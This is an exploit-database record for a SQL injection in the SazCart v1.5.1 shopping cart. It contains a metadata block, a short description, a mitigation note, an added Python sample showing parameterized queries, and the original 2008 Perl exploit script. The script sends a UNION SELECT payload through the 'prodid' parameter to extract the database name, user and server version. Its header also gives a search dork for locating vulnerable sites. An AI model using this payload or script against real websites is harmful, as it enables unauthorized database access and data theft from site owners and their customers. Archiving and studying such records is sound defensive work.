Vendor: SazCart
By: JosS
CVSS: 8.8 (HIGH)
CWE: 89 (SQL Injection)
Product Name: SazCart
Affected Version From: v1.5.1
Affected Version To: v1.5.1
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

SazCart <= v1.5.1 (details&prodid) Remote SQL Injection Exploit

This exploit injects SQL through the 'prodid' parameter of the 'details' page in the vulnerable SazCart application. By exploiting this vulnerability, an attacker can read data from the database; the published exploit retrieves the database name, the database user, and the database server version.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
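
The mitigation above as an added example (not SazCart code and not part of the original advisory): the same lookup written with string concatenation and with allow-list validation plus a bound parameter. It uses Python with an in-memory SQLite database as a stand-in for the shop's database; the table, column and function names and the sample value are assumptions constructed for illustration.

```python
import sqlite3

# Constructed stand-in for the shop database (SQLite instead of MySQL);
# the table and column names are assumptions, not SazCart's schema.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript(
        "CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price TEXT);"
        "INSERT INTO products VALUES (1, 'Widget', '9.99');"
    )
    return db

def price_concat(db, prodid):
    """Vulnerable pattern: the request value is spliced into the SQL text."""
    sql = "SELECT name, price FROM products WHERE id = '" + prodid + "'"
    return db.execute(sql).fetchall()

def parse_prodid(raw):
    """Allow-list validation: a product id is 1 to 9 ASCII digits, nothing else."""
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 9):
        raise ValueError("prodid must be a decimal integer")
    return int(raw)

def price_bound(db, prodid):
    """Hardened pattern: validate first, then bind the value as a parameter."""
    sql = "SELECT name, price FROM products WHERE id = ?"
    return db.execute(sql, (parse_prodid(prodid),)).fetchall()

# Constructed SQLite analogue of the UNION-style value used in the exploit below.
UNION_VALUE = "1' UNION ALL SELECT 'injected', sqlite_version() -- "

if __name__ == "__main__":
    db = make_db()
    # The concatenated query returns an extra row carrying the engine version.
    print("concatenated:", price_concat(db, UNION_VALUE))
    print("bound, valid id:", price_bound(db, "1"))
    try:
        price_bound(db, UNION_VALUE)
    except ValueError as exc:
        print("bound, hostile value rejected:", exc)
```

The bound parameter alone already keeps the value out of the SQL text; the integer check additionally rejects malformed requests before they reach the database, which also gives a clean point to log them.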

Exploit-DB raw data:

#!/usr/bin/perl

# SazCart <= v1.5.1 (details&prodid) Remote SQL Injection Exploit
# HomePage: http://www.sazcart.com
# Discovered & Coded by JosS
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team / Sys - Project / EspSeC
# http://www.spanish-hackers.com
# rgod forever :D

# Dork: "Powered by SazCart"


print "\t\t########################################################\n\n";
print "\t\t#   SazCart <= v1.5.1 - Remote SQL Injection Exploit   #\n\n";
print "\t\t#                       by JosS                        #\n\n";
print "\t\t########################################################\n\n";

use strict;
use LWP::UserAgent;

my $victim = $ARGV[0];

if(!$ARGV[0]) {
    print "\n[x] SazCart <= v1.5.1 - Remote SQL Injection Exploit\n";
    print "[x] written by JosS - sys-project[at]hotmail.com\n";
    print "[x] usage: perl xpl.pl [host]\n";
    print "[x] example: http://localhost/path/\n\n";
    exit(1);
}

print "\n[+] Exploiting...\n";
my $cnx = LWP::UserAgent->new() or die;
my $go = $cnx->get($victim."?details&prodid=1'+union+all+select+0,1,convert(concat(database(),char(58),user(),char(58),version()),char),3,4/*");
if ($go->content =~ m/Price<\/b>\:(.*?)\<br/ms) {
    print "[+] $1\n\n";
} else {
    print "\n[-] exploit failed\n";
}

# milw0rm.com [2008-05-09]